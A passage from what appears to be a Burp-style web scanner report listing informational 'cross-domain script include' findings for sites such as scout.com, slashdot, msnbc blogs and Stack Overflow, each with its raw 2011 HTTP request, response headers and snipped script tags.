P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...

23.282. http://realestate.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article.aspx?cp-documentid=26575425&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1bfe95ff9571433495df9b083be3b776; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=420410607C354E3D979F73C5FC7C1273; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 61517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

23.283. http://realestate.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /slideshow.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /slideshow.aspx HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 50044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...

23.284. http://recruiting.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=153805115.1296350458.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=153805115.697096863.1296350458.1296350458.1296350458.1; SessionBrandId=0; __utmc=153805115; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=153805115.1.10.1296350458;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:16 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:28:16 GMT
Last-Modified: Sun, 30 Jan 2011 02:15:18 GMT
ETag: "1CBC02389E3FF00"
Content-Type: text/html
Content-Length: 280509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.285. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a.z HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 29 Jan 2011 23:50:44 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:44 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.286. http://redtape.msnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.msnbc.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: redtape.msnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web020
X-Webserver: oak-tp-web020
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/html; charset=utf-8
Content-Length: 39293
Date: Sun, 30 Jan 2011 02:18:20 GMT
X-Varnish: 2755478365
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script type="text/javascript" src="http://static.typepad.com/.shared:v20110127.01-0-ga90527b:typepad:en_us/js/yui/yahoo-dom-event.js,/js/sixatrack-loader.js"></script>
...[SNIP]...
<div id="nav">

<script language="JavaScript" src="http://www.msnbc.msn.com/js/std.js"></script>
...[SNIP]...
</script>
   <script language="JavaScript" src="http://www.msnbc.msn.com/js/s_code_remote.js"></script>
...[SNIP]...
<li><script language="javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js" type="text/javascript" ></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.287. http://redtape.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redtape.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: redtape.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 65847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.288. http://rive.rs/projects/tumblr-tag-clouds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rive.rs
Path:   /projects/tumblr-tag-clouds

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /projects/tumblr-tag-clouds HTTP/1.1
Host: rive.rs
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
ETag: "b7894ef62577238e8cd33a6c0c66fdc7"
X-Runtime: 5
Content-Length: 5660
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en-US' xml:lang='en-US' xmlns='http://www.w3.org/1999/xhtml'>
<hea
...[SNIP]...
<!--Start Tumblr Tag Cloud-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

23.289. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=900
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263787

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.290. http://science.slashdot.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://science.slashdot.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: science.slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
SLASH_LOG_DATA: shtml
X-Powered-By: Slash 2.005001
X-Bender: In the event of an emergency, my ass can be used as a flotation device.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 82642
Date: Sun, 30 Jan 2011 02:18:39 GMT
X-Varnish: 257579542
Age: 1
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '490080280767515490',
   before_content: (new Date).getTime()
};
function pageload
...[SNIP]...
<!-- -->


<script src="//a.fsdn.com/sd/all-minified.js?T_2_5_0_306d" type="text/javascript"></script>
...[SNIP]...
<div class="advertisement marchex railad" style="padding-top:75px">
           <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=941&amp;ct=SLASHDOT_ROS&amp;num=3&amp;layt=300x250IMGAD&amp;fmt=simp"></script>
...[SNIP]...

23.291. http://scouthoops.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scouthoops.scout.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: scouthoops.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:37:08 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:47:08 GMT
Last-Modified: Sat, 29 Jan 2011 23:52:20 GMT
ETag: "1CBC00F91011200"
Content-Type: text/html
Content-Length: 111693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.292. https://secure.bundle.com/msn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /msn

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /msn HTTP/1.1
Host: secure.bundle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app02
X-Bundle-Server: prod-web01
Date: Sun, 30 Jan 2011 01:37:09 GMT
Content-Length: 26954
Connection: close
Cache-Control: private, no-store, max-age=0
Cache-Control: private, no-store, max-age=0
Expires: Sat, 29 Jan 2011 09:21:30 GMT
Expires: Sat, 29 Jan 2011 09:21:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="https://secure.footprint.net/bstmsn/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

23.293. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a.z HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:50:53 GMT
Server: Microsoft-IIS/6.0
Server: Secure3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:00:53 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
</script>
       <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
       <script type="text/javascript" src="http://images.video.redacted/js/ch/channels.js"></script>
...[SNIP]...

23.294. https://security.live.com/LoginStage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://security.live.com
Path:   /LoginStage.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /LoginStage.aspx HTTP/1.1
Host: security.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 29 Jan 2011 23:13:42 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-UA-Compatible: IE=7
Set-Cookie: ASP.NET_SessionId=bh2zle2prh4zk145gn1nyx45; path=/; HttpOnly
Set-Cookie: xid=ef438ff2-3226-4bb0-84b7-a945e2ffe5ee&&TK2xxxxxxx1B06&61; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=783525862&U=&E=&P=&B=en; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.security.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:42 GMT; path=/
Set-Cookie: wlv=A|_-d:s*phzLBQ.2+1+0+3; domain=.live.com; path=/
Set-Cookie: PreScript=; path=/
Set-Cookie: E=P:+L7nTSGOzYg=:BemJ+zHQEPLPNnFkDqtAse01gEABPmRe8NpO46JTjNc=:F; domain=.live.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.wlxrs.com/UTvyLWe4NTcjsg1fWir74g/liteframework.js" ></script>
...[SNIP]...

23.295. http://seedmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seedmagazine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: seedmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:01 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: exp_last_visit=981011942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_last_activity=1296371942; expires=Mon, 30-Jan-2012 02:19:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 02:19:02 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 31451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<
...[SNIP]...
<!-- documentation for this script: http://code.google.com/p/ie7-js/ -->

<script src="http://ajax.googleapis.com/ajax/libs/mootools/1.2.1/mootools-yui-compressed.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.296. http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.msdn.microsoft.com
Path:   /Forums/en-US/windowsphone7series/threads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Forums/en-US/windowsphone7series/threads HTTP/1.1
Host: social.msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB21
Date: Sat, 29 Jan 2011 23:26:34 GMT
Content-Length: 62798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...
<meta name="CommunityInfo" content=" B=Msdn;A=Forums;L=en-US;" />
<script src="http://ajax.aspnetcdn.com/ajax/jquery/jquery-1.4.4.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.297. http://spacefellowship.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spacefellowship.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache
Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly
Connection: close
Content-Type: text/html; charset: utf-8
Content-Length: 92137

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.298. http://stackoverflow.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:12:26 GMT
Last-Modified: Sun, 30 Jan 2011 15:11:26 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:11:25 GMT
Content-Length: 194989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Stack Overflow</title>

<link rel="stylesheet" type="text/css
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.299. http://stackoverflow.com/questions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /questions HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:42 GMT
Content-Length: 51939


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Newest Questions - Stack Overflow</title>

<link rel="stylesh
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" title="Stack Overflow" href="/opensearch.xml">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://sstatic.net/js/master.min.js?v=e8eb0725b4bd"></script>
...[SNIP]...
